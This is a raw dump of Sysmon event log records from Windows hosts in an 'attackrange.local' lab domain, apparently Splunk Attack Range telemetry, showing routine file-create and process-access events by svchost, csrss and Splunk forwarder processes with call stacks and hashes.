07:55:24.949{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=CC2472A6D52F4D09907DBB98C427ADEF,SHA256=AECCDDE15BA32EBE7071DFC18D9BA09D2D640C2F1F83A2B3C4AF097B0E733AB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:24.797{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51EB428A063C9F164F4AD7084BC69D7D,SHA256=EBBC508D0A45ED61A239F151BF08ED212B7CC5168EB8260D1AA1FE6EE65A4321,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F56C-60EB-8979-00000000D001}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56C-60EB-8979-00000000D001}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.972{0C1E0330-F56C-60EB-8979-00000000D001}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.518{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E07A5B144CCC7FA4790C683374F61498,SHA256=05F844FED8BF87B096867346D0C729D86A0AE6DA720F9DB7CBD3BB4DE95415D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.456{0C1E0330-F56C-60EB-8879-00000000D001}216404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56C-60EB-8879-00000000D001}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F56C-60EB-8879-00000000D001}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56C-60EB-8879-00000000D001}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 